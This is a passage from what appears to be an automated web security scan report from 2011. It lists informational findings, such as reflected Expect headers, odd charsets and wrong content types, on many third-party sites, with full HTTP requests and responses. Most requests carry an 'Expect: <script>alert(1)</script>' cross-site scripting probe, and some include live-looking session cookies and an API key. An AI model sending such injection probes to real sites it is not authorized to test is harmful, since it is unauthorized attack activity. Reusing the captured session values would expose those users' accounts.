</body>
</html>
33.80. http://www.tacklewarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tacklewarehouse.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tacklewarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:24 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Fri, 09 Jul 2010 16:15:49 GMT
Content-Length: 82726
Content-Type: text/html

............ .h...F... .... .........00.... ..%..V......... .(....:..(....... ..... ...................................................................................................................
...[SNIP]...
33.81. http://www.techonlife.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techonlife.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.techonlife.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

33.82. http://www.tenniswarehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenniswarehouse.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tenniswarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:18 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 02 Mar 2005 01:31:45 GMT
Content-Length: 1406
Content-Type: text/html

..............h.......(....... ...........@............................nL......................H*......de.......{..........0.......Y-..............{u..TC......C........|..h?.......h..{Z.......... ....
...[SNIP]...
33.83. http://www.termite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.termite.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.termite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.84. http://www.tube555.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tube555.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tube555.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Mon, 02 May 2011 00:22:27 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.0</center>
</body>
</html>
33.85. http://www.tubespecials.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tubespecials.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubespecials.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.86. http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/html/xd_receiver.htm

Request

GET /wp-adv/jobs4/html/xd_receiver.htm HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wpni_poe=true; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html
Expires: Sun, 01 May 2011 23:34:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Cross-Domain Receiver Page</tit
...[SNIP]...
33.87. http://www.weddings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weddings.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.weddings.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 00:28:37 GMT
Content-Length: 640
Content-Type: text/html
Server: Microsoft-IIS/6.0
box: 03
X-Powered-By: ASP.NET

<html><head><title>Error</title></head><body>The system cannot find the file specified.
<!-- Start HtmlInjectISAPIFilter --><script type="text/javascript">if(!_isexec){var _isexec=true;(function(){va
...[SNIP]...
33.88. http://www.wheelfire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wheelfire.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wheelfire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:35:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.89. http://www.womenolder.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womenolder.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.womenolder.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Sun, 01 May 2011 23:16:09 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>
33.90. http://www.wtuber.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtuber.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wtuber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 01 May 2011 23:46:42 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
33.91. http://www.wyeke.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wyeke.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wyeke.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
33.92. http://www.yoplait.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yoplait.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yoplait.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Mon, 02 May 2011 00:33:03 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.
34. HTML uses unrecognised charset  previous  next
There are 4 instances of this issue:

34.1. http://www.animeyoung.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.animeyoung.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.animeyoung.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 02 May 2011 00:34:02 GMT
Content-Type: text/html
Content-Length: 516
Connection: keep-alive

<HTML><HEAD>

<TITLE>ERROR 404 - Page can not be found</TITLE>
<!--DoctorPleasure.com - Adult Index Page-->

<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<base target="_blank">
...[SNIP]...
34.2. http://www.mktginc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.mktginc.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mktginc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Length: 355
Keep-Alive: timeout-5, max=1000
Connection: Keep-Alive
Cache-Control: no-cache
Content-Type: text/html; charset="iso-8859-1"

<html><head><title>Attack Detected</title></head><body><font size=2><table width="100%"><tr><td bgcolor=#3300cc align="center" colspan=2><font color=#ffffff><b>Blocked because of IPS attack</b></font>
...[SNIP]...
34.3. http://www.swoopo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.swoopo.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swoopo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
P3P: policyref="/w3c/p3p.xml", CP="NOI NAV IND PSAa OUR"
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1135910088"
Last-Modified: Fri, 08 Oct 2010 07:13:20 GMT
Content-Length: 1660
Xonnection: close
Date: Mon, 02 May 2011 00:19:45 GMT
Server: swoopo-httpd

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=" />
<title>
...[SNIP]...
34.4. http://www.washingtonpost.com/wl/jobs/home  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="Washington DC jobs, Washington DC careers, Washington DC area jobs, Washington DC area careers, search jobs, search careers, search DC jobs">
...[SNIP]...
35. Content type incorrectly stated  previous  next
There are 77 instances of this issue:

35.1. http://bdv.bidvertiser.com/BidVertiser.dbm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bdv.bidvertiser.com
Path:   /BidVertiser.dbm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BidVertiser.dbm?pid=349166&bid=862453 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:34:50 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:34:50 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 1393
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 1393


try
{
tref=1;
win_name='null';
report_error=0;
docref='';
try
{
if (window.top.location=='') aa=1;
docref=document.referrer;
}
catch(er)
{
report_error=1;
docref='none';
}
if (report_err
...[SNIP]...
35.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2193540&PluID=0&w=160&h=600&64cd0da313&ncu=http://d1.openx.org/ck.php?oaparams=2__bannerid=522976__zoneid=0__OXLCA=1__cb=64cd0da313__r_id=85dbdb9e09296233a4d7b328928878f8__r_ts=lkjpfk__oadest=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D%3Bcb%3D1442324580http%253A%252F%252Fwww.zipcar.com%252Fwebchi3col75&ucm=true&ncu=$$%c$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?resize=1&campaignid=246606&what=chi160x600&ct0=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBIsVPfQ--TffUN9q86QaO0KkvyMnAgAKQ3aCnJriw6u9EABABGAEgADgBUIDH4cQEYMnug4jwo-wSggEXY2EtcHViLTcyNTExNzM2MDIxMjU3NzWgAeDq_toDsgERd3d3LmphcGFuYXRvci5jb226AQoxNjB4NjAwX2FzyAEJ2gEtaHR0cDovL3d3dy5qYXBhbmF0b3IuY29tL2VsZXBoYW50L2xvZ2luLnBodG1smAKOAsACBMgCgOr2FqgDAegDvQL1AwAAAOQ%26num%3D1%26sig%3DAGiWqtwQa1xoRafBymiCbfwPHRB1hm9EPA%26client%3Dca-pub-7251173602125775%26adurl%3D;cb=1442324580&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=8023169f-8dce-4de3-84d7-d5a4468633313HG09g; ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; A3=iQQIaFx503Dk00000iKhqaHW208A300001jj9MaH17066N00001iZLfaFB607pd00001j0InaHlY09sO00001j4HbaE.a0a9y00001jGDhaHW50d8900000jcM0aFSa04m400000eDVwaDPh084o00001gY2paFS+09nl00003jGDjaHWf0d8900000hH4jaFhv09wy00001jcL+aFTt04m400000hEI2aE.a09B400001jmnFaEUX09SF00002jGaZaHWf0d8900004johvaFxN07uh00002h52YaGZy0ca700001hUDyaFGt0cbS00001i54CaFsN09MT00000eDVtaDP.084o00001jeoLaF6J07Hs00001j2fVaFWe07aw00001jFY.aHqe0d8900001j2VdaGyd07aw00001j8QYaEBz07LU00001igT+aFh30cXt00001hUBuaFGt0cbS00001jv+zaH1o0d8900002jFZhaHWf0d8900000jAtnaHq602WG00001iBU1aEBz0aVU000019rW0aFGt04uw00001; B3=9yE10000000000up7.Wt0000000001ui9cTR0000000001uf8Dka0000000001uh85Yh0000000001un9abz0000000000ui52BU0000000001ui9fJa0000000001ul8TfJ0000000001uh9eB50000000001uj9yMi0000000000up8Wi10000000001un93M20000000001uf82Np0000000001um9ufH0000000002um99ex0000000001um9yMk0000000000up9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud8Zxy0000000001up9qqo0000000002ui9yDd0000000001un78O70000000001ud9gdG0000000001uh8z+.0000000001uh9pRI0000000002ug9iae0000000001uh9xwn0000000004up7.Ws0000000001ui99y10000000001ui80Dr0000000003uj; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=iQQIaFx503Dk00000j0InaHlY09sO00001iZLfaFB607pd00001jj9MaH17066N00001iKhqaHW208A300001jGDhaHW50d8900000j4HbaE.a0a9y00001eDVwaDPh084o00001jcM0aFSa04m400000jGDjaHWf0d8900000gY2paFS+09nl00003hH4jaFhv09wy00001hEIkaItM0bI400001jmnFaEUX09SF00002hEI2aE.a09B400001jcL+aFTt04m400000jGaZaHWf0d8900004h52YaGZy0ca700001johvaFxN07uh00002i54CaFsN09MT00000hUDyaFGt0cbS00001eDVtaDP.084o00001j2fVaFWe07aw00001jeoLaF6J07Hs00001jFY.aHqe0d8900001j8QYaEBz07LU00001j2VdaGyd07aw00001jv+zaH1o0d8900002hUBuaFGt0cbS00001igT+aFh30cXt000019rW0aFGt04uw00001iBU1aEBz0aVU00001jAtnaHq602WG00001jFZhaHWf0d8900000; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=7.Wt0000000001ui9yE10000000000up8Dka0000000001uh9cTR0000000001uf85Yh0000000001un52BU0000000001ui9abz0000000000ui9yMi0000000000up9eB50000000001uj8TfJ0000000001uh9fJa0000000001ul8ny40000000001uq9ufH0000000002um82Np0000000001um93M20000000001uf8Wi10000000001un9yMk0000000000up99ex0000000001um9kkO0000000000uj8OuK0000000000ui9kkN0000000000uj78Oj0000000001ud9yDd0000000001un9qqo0000000002ui8Zxy0000000001up9gdG0000000001uh78O70000000001ud9pRI0000000002ug8z+.0000000001uh9iae0000000001uh80Dr0000000003uj99y10000000001ui7.Ws0000000001ui9xwn0000000004up; expires=Sat, 30-Jul-2011 22:08:15 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
35.3. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /CC4A2528-2176-11DF-BB34-61FFECADD848

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /CC4A2528-2176-11DF-BB34-61FFECADD848 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:57:35 GMT
Server: Barista/1.1-(eanjbj)
Connection: Close
Content-Length: 8991
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css"> div#p360-hybrid160x600aquabulgeads-CC4A2528-2176-11DF-BB34-61FFECADD848 { width: 160px; left: 0; font-family: sans-serif; position: relative; disp
...[SNIP]...
35.4. http://csrc.nist.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://csrc.nist.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: csrc.nist.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:38 GMT
Server: Apache
Last-Modified: Wed, 03 Oct 2007 13:21:24 GMT
ETag: "20dc404-13e-43b968bd57d00"
Accept-Ranges: bytes
Content-Length: 318
NIST: g3
Content-Type: text/plain

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...
35.5. http://j.maxmind.com/app/geoip.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://j.maxmind.com
Path:   /app/geoip.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /app/geoip.js HTTP/1.1
Host: j.maxmind.com
Proxy-Connection: keep-alive
Referer: http://usjobsresource.com/3/?s=31s-2100u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:33:06 GMT
Expires: Mon, 02 May 2011 00:03:06 GMT
Cache-Control: private
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 504
X-Req-Start: t=1304292786258231
X-Req-Proc: D=289
Connection: close
X-Pad: avoid browser bug

function geoip_country_code() { return 'US'; }
function geoip_country_name() { return 'United States'; }
function geoip_city() { return 'Dallas'; }
function geoip_region() { return 'TX';
...[SNIP]...
35.6. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.pulse360.com
Path:   /blob/fb/6e141bc3_social_security_card.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /blob/fb/6e141bc3_social_security_card.jpg HTTP/1.1
Host: static.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:22 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 00:00:00 GMT
ETag: "d2ffd-243e-b917a000"
Accept-Ranges: bytes
Content-Length: 9278
Connection: close
Content-Type: image/jpeg

......JFIF.....`.`......Exif..II*..............C....................................................................C.......................................................................K.d.."......
...[SNIP]...
35.7. http://v6test.cdn.att.net/special.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://v6test.cdn.att.net
Path:   /special.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /special.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 19:02:58 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 35
Content-Type: image/jpeg
P3p: policyref="http://www.corp.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
ETag: "2e413718-b-23-4cb7067f"
Last-Modified: Thu, 14 Oct 2010 13:32:47 GMT
Accept-Ranges: bytes
X-Cache: HIT from 12.120.38.40
Cache-Control: max-age=2592000
Age: 16461
X-Cache: HIT from 12.120.79.19
